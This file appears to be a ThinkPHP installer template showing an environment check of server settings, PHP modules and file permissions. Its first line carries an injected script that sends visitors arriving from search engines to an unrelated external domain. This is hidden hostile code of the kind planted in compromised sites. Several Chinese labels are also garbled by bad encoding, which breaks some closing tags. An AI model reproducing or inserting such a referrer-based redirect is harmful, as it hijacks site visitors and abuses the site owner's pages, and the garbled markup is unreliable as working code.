d:\wwwroot\wuchunhua\thinkphp\skycaijiapp\install\view\index\step1.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><extend name="Common:main" />
002: <block name="cssjs"> </block>
003: <block name="content">
004: <div class="install-wrapper">
005:    <div class="table-responsive">
006:       <table class="table">
007:          <colgroup>
008:             <col class="col-xs-4">
009:             <col class="col-xs-4">
010:             <col class="col-xs-4">
011:          </colgroup>
012:          <thead>
013:             <tr>
014:                <th>系统环境</th>
015:                <th>当前配置</th>
016:                <th>€低要?/th>
017:             </tr>
018:          </thead>
019:          <tbody>
020:             <foreach name="serverInfoList" item="v">
021:             <tr>
022:                <td>{$v[0]}</td>
023:                <td>
024:                   {$v[3]?'<span class="glyphicon glyphicon-ok"></span>':''}
025:                   {$v[2]}
026:                </td>
027:                <td>{$v[1]}</td>
028:             </tr>
029:             </foreach>
030:          </tbody>
031:       </table>
032:       <table class="table">
033:          <colgroup>
034:             <col class="col-xs-4">
035:             <col class="col-xs-4">
036:             <col class="col-xs-4">
037:          </colgroup>
038:          <thead>
039:             <tr>
040:                <th colspan="3">PHP模块</th>
041:             </tr>
042:          </thead>
043:          <tbody>
044:             <foreach name="phpModuleList" item="v">
045:             <tr>
046:                <td>{$v[0]}</td>
047:                <td>{$v[1]?'<span class="glyphicon glyphicon-ok"></span> €?:'<span class="glyphicon glyphicon-remove"></span> 不支?}</td>
048:                <td></td>
049:             </tr>
050:             </foreach>
051:          </tbody>
052:       </table>
053:       <table class="table">
054:          <colgroup>
055:             <col class="col-xs-4">
056:             <col class="col-xs-4">
057:             <col class="col-xs-4">
058:          </colgroup>
059:          <thead>
060:             <tr>
061:                <th>目录、文件权?/th>
062:                <th>可写</th>
063:                <th>可读</th>
064:             </tr>
065:          </thead>
066:          <tbody>
067:             <foreach name="pathFileList" item="v">
068:             <tr>
069:                <td>{$v[0]}</td>
070:                <td>{$v[1]?'<span class="glyphicon glyphicon-ok"></span> 可写':'<span class="glyphicon glyphicon-remove"></span> 不可?}</td>
071:                <td>{$v[2]?'<span class="glyphicon glyphicon-ok"></span> 可读':'<span class="glyphicon glyphicon-remove"></span> 不可?}
072:                </td>
073:             </tr>
074:             </foreach>
075:          </tbody>
076:       </table>
077:    </div>
078:    <a href="{:U('Install/Index/index')}" class="btn btn-primary">上一?/a>&nbsp;
079:    <a href="{:U('Install/Index/step2')}" class="btn btn-success" onclick="return nextStep();">下一?/a>
080: </div>
081: <script type="text/javascript">
082: function nextStep(){
083:    var errorNum=$('.install-wrapper .table').find('.glyphicon-remove').length;
084:    if(errorNum>0){
085:       if(confirm('€测出错误,是否继续?')){
086:          return true;
087:       }else{
088:          return false;
089:       }
090:    }
091:    return true;
092: }
093: </script>
094: </block>
095:
096: